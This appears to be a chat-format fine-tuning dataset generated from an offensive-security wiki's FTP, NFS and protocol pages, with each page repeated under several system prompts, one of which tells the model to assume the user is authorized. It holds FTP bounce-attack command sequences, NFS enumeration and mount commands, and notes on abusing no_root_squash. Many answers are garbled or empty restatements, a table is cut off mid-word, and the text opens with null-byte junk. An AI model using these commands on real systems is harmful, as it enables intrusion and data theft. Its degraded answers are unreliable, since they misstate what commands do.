^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n...", "metadata": {"corpus_index": 1504, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "user"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ FTP - Steps?"}, {"role": "assistant", "content": "user ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n..."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ FTP - Steps?", "response": "user ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n...", "metadata": {"corpus_index": 1504, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `user ftp # user and pass of the targeted server`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ftp - steps. Steps"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `user ftp # user and pass of the targeted server`?", "response": "This command is used for 🛠️ ftp - steps. Steps", "metadata": {"corpus_index": 1504, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Run command for 🛠️ ftp - steps"}, {"role": "assistant", "content": "#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Run command for 🛠️ ftp - steps", "response": "#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\"", "metadata": {"corpus_index": 1505, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Run"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ FTP - Steps during a pentest?"}, {"role": "assistant", "content": "#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ FTP - Steps during a pentest?", "response": "#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\"", "metadata": {"corpus_index": 1505, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Initial access (protocols) - Theory work?"}, {"role": "assistant", "content": "To gain initial access into an information system, one of the most common vectors will be exploiting badly configured protocols inside the enterprise network. If companies don't necessarily implement each of the protocols listed in this category, most of them can have configuration vulnerabilities that will allow you to gain an entry point into the system. Some insecure protocols, like Telnet, HTTP, or old versions of SMB, are more rarely found in enteprise systems or services (but always check, you never know if some legacy machines have them activated 😉). Knowing which tools exist to manipulate these protocols and their possible misconfigurations is essential ! You may find it interesting to explore the following :\n- Broken authentication (FTP anonymous login, SSH default creds, open SMB shares) ;\n- Information disclosure (DBMS protocols such as MySQL or MSSQL, or usage of HTTP instead of HTTPS) ;\n- Exploiting enterprise authentication methods such as Kerberos tickets or LDAP requests, in order to compromise either a user or a service ;\n- Data exfiltration using standard file exchange protocols, but also more unconventional methods such as DNS data exfiltration\n- Or even gaining direct access/code execution to a machine using one of the protocols below, and tools like impacket or NetExec, which could then open many doors !\n\n> [!TIP] TIP\n> NetExec is a great network service exploitation tool that can help in exploiting protocols and assessing the security posture of an information system. It supports a lot of common enterprise protocols : smb, ssh, ldap, wmi, rdp, mssql... in combination with different auth methods (Kerberos, standard credentials)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Initial access (protocols) - Theory work?", "response": "To gain initial access into an information system, one of the most common vectors will be exploiting badly configured protocols inside the enterprise network. If companies don't necessarily implement each of the protocols listed in this category, most of them can have configuration vulnerabilities that will allow you to gain an entry point into the system. Some insecure protocols, like Telnet, HTTP, or old versions of SMB, are more rarely found in enteprise systems or services (but always check, you never know if some legacy machines have them activated 😉). Knowing which tools exist to manipulate these protocols and their possible misconfigurations is essential ! You may find it interesting to explore the following :\n- Broken authentication (FTP anonymous login, SSH default creds, open SMB shares) ;\n- Information disclosure (DBMS protocols such as MySQL or MSSQL, or usage of HTTP instead of HTTPS) ;\n- Exploiting enterprise authentication methods such as Kerberos tickets or LDAP requests, in order to compromise either a user or a service ;\n- Data exfiltration using standard file exchange protocols, but also more unconventional methods such as DNS data exfiltration\n- Or even gaining direct access/code execution to a machine using one of the protocols below, and tools like impacket or NetExec, which could then open many doors !\n\n> [!TIP] TIP\n> NetExec is a great network service exploitation tool that can help in exploiting protocols and assessing the security posture of an information system. It supports a lot of common enterprise protocols : smb, ssh, ldap, wmi, rdp, mssql... in combination with different auth methods (Kerberos, standard credentials).", "metadata": {"corpus_index": 1506, "category": "active_directory", "source_file": "docs/src/infra/protocols/index.md", "page_title": "Initial access (protocols)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Initial access (protocols) - Theory?"}, {"role": "assistant", "content": "To gain initial access into an information system, one of the most common vectors will be exploiting badly configured protocols inside the enterprise network. If companies don't necessarily implement each of the protocols listed in this category, most of them can have configuration vulnerabilities that will allow you to gain an entry point into the system. Some insecure protocols, like Telnet, HTTP, or old versions of SMB, are more rarely found in enteprise systems or services (but always check, you never know if some legacy machines have them activated 😉). Knowing which tools exist to manipulate these protocols and their possible misconfigurations is essential ! You may find it interesting to explore the following :\n- Broken authentication (FTP anonymous login, SSH default creds, open SMB shares) ;\n- Information disclosure (DBMS protocols such as MySQL or MSSQL, or usage of HTTP instead of HTTPS) ;\n- Exploiting enterprise authentication methods such as Kerberos tickets or LDAP requests, in order to compromise either a user or a service ;\n- Data exfiltration using standard file exchange protocols, but also more unconventional methods such as DNS data exfiltration\n- Or even gaining direct access/code execution to a machine using one of the protocols below, and tools like impacket or NetExec, which could then open many doors !\n\n> [!TIP] TIP\n> NetExec is a great network service exploitation tool that can help in exploiting protocols and assessing the security posture of an information system. It supports a lot of common enterprise protocols : smb, ssh, ldap, wmi, rdp, mssql... in combination with different auth methods (Kerberos, standard credentials)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Initial access (protocols) - Theory?", "response": "To gain initial access into an information system, one of the most common vectors will be exploiting badly configured protocols inside the enterprise network. If companies don't necessarily implement each of the protocols listed in this category, most of them can have configuration vulnerabilities that will allow you to gain an entry point into the system. Some insecure protocols, like Telnet, HTTP, or old versions of SMB, are more rarely found in enteprise systems or services (but always check, you never know if some legacy machines have them activated 😉). Knowing which tools exist to manipulate these protocols and their possible misconfigurations is essential ! You may find it interesting to explore the following :\n- Broken authentication (FTP anonymous login, SSH default creds, open SMB shares) ;\n- Information disclosure (DBMS protocols such as MySQL or MSSQL, or usage of HTTP instead of HTTPS) ;\n- Exploiting enterprise authentication methods such as Kerberos tickets or LDAP requests, in order to compromise either a user or a service ;\n- Data exfiltration using standard file exchange protocols, but also more unconventional methods such as DNS data exfiltration\n- Or even gaining direct access/code execution to a machine using one of the protocols below, and tools like impacket or NetExec, which could then open many doors !\n\n> [!TIP] TIP\n> NetExec is a great network service exploitation tool that can help in exploiting protocols and assessing the security posture of an information system. It supports a lot of common enterprise protocols : smb, ssh, ldap, wmi, rdp, mssql... in combination with different auth methods (Kerberos, standard credentials).", "metadata": {"corpus_index": 1506, "category": "active_directory", "source_file": "docs/src/infra/protocols/index.md", "page_title": "Initial access (protocols)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Initial access (protocols) - Well known ports"}, {"role": "assistant", "content": "| Common port | Protocol | Description |\n| ------------------------ | -------- | ----------- |\n| 21/TCP | FTP | File Transfer Protocol - Standard network protocol used for transferring files from one host to another over a TCP-based network. FTP uses a client-server architecture and operates in both active and passive modes. It lacks encryption, making it less secure for transmitting sensitive data. |\n| 22/TCP | SSH | Secure Shell - Cryptographic network protocol to operate services and devices securely over an unsecured network. SSH uses public-key cryptography for authentication and symmetric encryption (e.g., AES, 3DES) for data confidentiality and integrity. It is widely used for remote login, command execution, and secure file transfers. |\n| 23/TCP | Telnet | Provides a command-line interface for communication with a remote device. Telnet transmits data, including passwords, in plaintext, making it vulnerable to eavesdropping and man-in-the-middle attacks. It has largely been replaced by SSH for secure remote access. |\n| 53/UDP or 53/TCP | DNS | Domain Name System - Hierarchical and decentralized naming system for computers, services, or other resources connected to the Internet or a private network. DNS translates human-readable domain names into IP addresses using a distributed database system. It can operate over both UDP and TCP, with UDP being more common for queries and TCP for zone transfers. |\n| 80/TCP | HTTP | HyperText Transfer Protocol - Application layer protocol that defines communication between a client and server over TCP, using a request-response model. Key features include request methods like GET, POST, PUT, and DELETE; response status codes (e.g., 200 OK, 404 Not Found); headers for metadata; and MIME types for data formats. It is not secure by default, HTTPS being preferred for secure communications. |\n| 88/TCP | Kerberos | The default authentication protocol for Active Directory, thus often used in enterprise environments. It is designed t"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Initial access (protocols) - Well known ports", "response": "| Common port | Protocol | Description |\n| ------------------------ | -------- | ----------- |\n| 21/TCP | FTP | File Transfer Protocol - Standard network protocol used for transferring files from one host to another over a TCP-based network. FTP uses a client-server architecture and operates in both active and passive modes. It lacks encryption, making it less secure for transmitting sensitive data. |\n| 22/TCP | SSH | Secure Shell - Cryptographic network protocol to operate services and devices securely over an unsecured network. SSH uses public-key cryptography for authentication and symmetric encryption (e.g., AES, 3DES) for data confidentiality and integrity. It is widely used for remote login, command execution, and secure file transfers. |\n| 23/TCP | Telnet | Provides a command-line interface for communication with a remote device. Telnet transmits data, including passwords, in plaintext, making it vulnerable to eavesdropping and man-in-the-middle attacks. It has largely been replaced by SSH for secure remote access. |\n| 53/UDP or 53/TCP | DNS | Domain Name System - Hierarchical and decentralized naming system for computers, services, or other resources connected to the Internet or a private network. DNS translates human-readable domain names into IP addresses using a distributed database system. It can operate over both UDP and TCP, with UDP being more common for queries and TCP for zone transfers. |\n| 80/TCP | HTTP | HyperText Transfer Protocol - Application layer protocol that defines communication between a client and server over TCP, using a request-response model. Key features include request methods like GET, POST, PUT, and DELETE; response status codes (e.g., 200 OK, 404 Not Found); headers for metadata; and MIME types for data formats. It is not secure by default, HTTPS being preferred for secure communications. |\n| 88/TCP | Kerberos | The default authentication protocol for Active Directory, thus often used in enterprise environments. It is designed t", "metadata": {"corpus_index": 1507, "category": "active_directory", "source_file": "docs/src/infra/protocols/index.md", "page_title": "Initial access (protocols)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Initial access (protocols) - Well known ports"}, {"role": "assistant", "content": "| Common port | Protocol | Description |\n| ------------------------ | -------- | ----------- |\n| 21/TCP | FTP | File Transfer Protocol - Standard network protocol used for transferring files from one host to another over a TCP-based network. FTP uses a client-server architecture and operates in both active and passive modes. It lacks encryption, making it less secure for transmitting sensitive data. |\n| 22/TCP | SSH | Secure Shell - Cryptographic network protocol to operate services and devices securely over an unsecured network. SSH uses public-key cryptography for authentication and symmetric encryption (e.g., AES, 3DES) for data confidentiality and integrity. It is widely used for remote login, command execution, and secure file transfers. |\n| 23/TCP | Telnet | Provides a command-line interface for communication with a remote device. Telnet transmits data, including passwords, in plaintext, making it vulnerable to eavesdropping and man-in-the-middle attacks. It has largely been replaced by SSH for secure remote access. |\n| 53/UDP or 53/TCP | DNS | Domain Name System - Hierarchical and decentralized naming system for computers, services, or other resources connected to the Internet or a private network. DNS translates human-readable domain names into IP addresses using a distributed database system. It can operate over both UDP and TCP, with UDP being more common for queries and TCP for zone transfers. |\n| 80/TCP | HTTP | HyperText Transfer Protocol - Application layer protocol that defines communication between a client and server over TCP, using a request-response model. Key features include request methods like GET, POST, PUT, and DELETE; response status codes (e.g., 200 OK, 404 Not Found); headers for metadata; and MIME types for data formats. It is not secure by default, HTTPS being preferred for secure communications. |\n| 88/TCP | Kerberos | The default authentication protocol for Active Directory, thus often used in enterprise environments. It is designed t"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Initial access (protocols) - Well known ports", "response": "| Common port | Protocol | Description |\n| ------------------------ | -------- | ----------- |\n| 21/TCP | FTP | File Transfer Protocol - Standard network protocol used for transferring files from one host to another over a TCP-based network. FTP uses a client-server architecture and operates in both active and passive modes. It lacks encryption, making it less secure for transmitting sensitive data. |\n| 22/TCP | SSH | Secure Shell - Cryptographic network protocol to operate services and devices securely over an unsecured network. SSH uses public-key cryptography for authentication and symmetric encryption (e.g., AES, 3DES) for data confidentiality and integrity. It is widely used for remote login, command execution, and secure file transfers. |\n| 23/TCP | Telnet | Provides a command-line interface for communication with a remote device. Telnet transmits data, including passwords, in plaintext, making it vulnerable to eavesdropping and man-in-the-middle attacks. It has largely been replaced by SSH for secure remote access. |\n| 53/UDP or 53/TCP | DNS | Domain Name System - Hierarchical and decentralized naming system for computers, services, or other resources connected to the Internet or a private network. DNS translates human-readable domain names into IP addresses using a distributed database system. It can operate over both UDP and TCP, with UDP being more common for queries and TCP for zone transfers. |\n| 80/TCP | HTTP | HyperText Transfer Protocol - Application layer protocol that defines communication between a client and server over TCP, using a request-response model. Key features include request methods like GET, POST, PUT, and DELETE; response status codes (e.g., 200 OK, 404 Not Found); headers for metadata; and MIME types for data formats. It is not secure by default, HTTPS being preferred for secure communications. |\n| 88/TCP | Kerberos | The default authentication protocol for Active Directory, thus often used in enterprise environments. It is designed t", "metadata": {"corpus_index": 1507, "category": "active_directory", "source_file": "docs/src/infra/protocols/index.md", "page_title": "Initial access (protocols)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ NFS - Theory"}, {"role": "assistant", "content": "NFS or Network File system allows a client to access files over a network in the same way they would access a local storage file.\n\nA NFS server determines what ressources to make available and ensures to recognize validated clients. From the client perspective, the machine requests access to a share by issuing a mount request. If successful the client can view and interact with the share as if its his own disk.\n\nThis service is located on the port 2049."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ NFS - Theory", "response": "NFS or Network File system allows a client to access files over a network in the same way they would access a local storage file.\n\nA NFS server determines what ressources to make available and ensures to recognize validated clients. From the client perspective, the machine requests access to a share by issuing a mount request. If successful the client can view and interact with the share as if its his own disk.\n\nThis service is located on the port 2049.", "metadata": {"corpus_index": 1508, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ NFS - Theory during a pentest?"}, {"role": "assistant", "content": "NFS or Network File system allows a client to access files over a network in the same way they would access a local storage file.\n\nA NFS server determines what ressources to make available and ensures to recognize validated clients. From the client perspective, the machine requests access to a share by issuing a mount request. If successful the client can view and interact with the share as if its his own disk.\n\nThis service is located on the port 2049."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ NFS - Theory during a pentest?", "response": "NFS or Network File system allows a client to access files over a network in the same way they would access a local storage file.\n\nA NFS server determines what ressources to make available and ensures to recognize validated clients. From the client perspective, the machine requests access to a share by issuing a mount request. If successful the client can view and interact with the share as if its his own disk.\n\nThis service is located on the port 2049.", "metadata": {"corpus_index": 1508, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ NFS - Enumerate mountable directories.?"}, {"role": "assistant", "content": "To check which share is available for mount, _showmount_ can be used.\n\n``\nshowmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with \n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ NFS - Enumerate mountable directories.?", "response": "To check which share is available for mount, _showmount_ can be used.\n\n``\nshowmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with \n``", "metadata": {"corpus_index": 1509, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ NFS - Enumerate mountable directories.?"}, {"role": "assistant", "content": "To check which share is available for mount, _showmount_ can be used.\n\n``\nshowmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with \n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ NFS - Enumerate mountable directories.?", "response": "To check which share is available for mount, _showmount_ can be used.\n\n``\nshowmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with \n``", "metadata": {"corpus_index": 1509, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the showmount syntax for 🛠️ nfs - enumerate mountable directories.?"}, {"role": "assistant", "content": "showmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the showmount syntax for 🛠️ nfs - enumerate mountable directories.?", "response": "showmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with", "metadata": {"corpus_index": 1510, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "showmount"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ NFS - Enumerate mountable directories.?"}, {"role": "assistant", "content": "showmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ NFS - Enumerate mountable directories.?", "response": "showmount -e \n/ * -> means that the root directory is shared to everyone on the network\n/ -> means that the root directory is shared with", "metadata": {"corpus_index": 1510, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `showmount -e`?"}, {"role": "assistant", "content": "This command is used for 🛠️ nfs - enumerate mountable directories.. Enumerate mountable directories."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `showmount -e`?", "response": "This command is used for 🛠️ nfs - enumerate mountable directories.. Enumerate mountable directories.", "metadata": {"corpus_index": 1510, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ NFS - Mounting directories."}, {"role": "assistant", "content": "A local directory where the shared directory will be mounted is necessary.\n\n``\nmkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ NFS - Mounting directories.", "response": "A local directory where the shared directory will be mounted is necessary.\n\n``\nmkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec\n``", "metadata": {"corpus_index": 1511, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ NFS - Mounting directories.?"}, {"role": "assistant", "content": "A local directory where the shared directory will be mounted is necessary.\n\n``\nmkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ NFS - Mounting directories.?", "response": "A local directory where the shared directory will be mounted is necessary.\n\n``\nmkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec\n``", "metadata": {"corpus_index": 1511, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the mkdir command for 🛠️ nfs - mounting directories."}, {"role": "assistant", "content": "mkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the mkdir command for 🛠️ nfs - mounting directories.", "response": "mkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec", "metadata": {"corpus_index": 1512, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "mkdir"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ NFS - Mounting directories."}, {"role": "assistant", "content": "mkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ NFS - Mounting directories.", "response": "mkdir /tmp/local_directory\nmount -t nfs :/directory /tmp/infosec", "metadata": {"corpus_index": 1512, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `mkdir /tmp/local_directory`?"}, {"role": "assistant", "content": "This command is used for 🛠️ nfs - mounting directories.. Mounting directories."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `mkdir /tmp/local_directory`?", "response": "This command is used for 🛠️ nfs - mounting directories.. Mounting directories.", "metadata": {"corpus_index": 1512, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ NFS - no_root_squash?"}, {"role": "assistant", "content": "Root squashing is a configuration that prevents remote root users to get a root access on the mounted NFS volume. Enabled by default remote root users are assigned as _nfsnobody ,_ which is a role that has the least local privileges.\n\nAlternatively \"no_root_squash\" parameter turns off this configuration and gives to the remote user, root access to the NFS volume.\n\nhttps://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ NFS - no_root_squash?", "response": "Root squashing is a configuration that prevents remote root users to get a root access on the mounted NFS volume. Enabled by default remote root users are assigned as _nfsnobody ,_ which is a role that has the least local privileges.\n\nAlternatively \"no_root_squash\" parameter turns off this configuration and gives to the remote user, root access to the NFS volume.\n\nhttps://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe", "metadata": {"corpus_index": 1513, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be 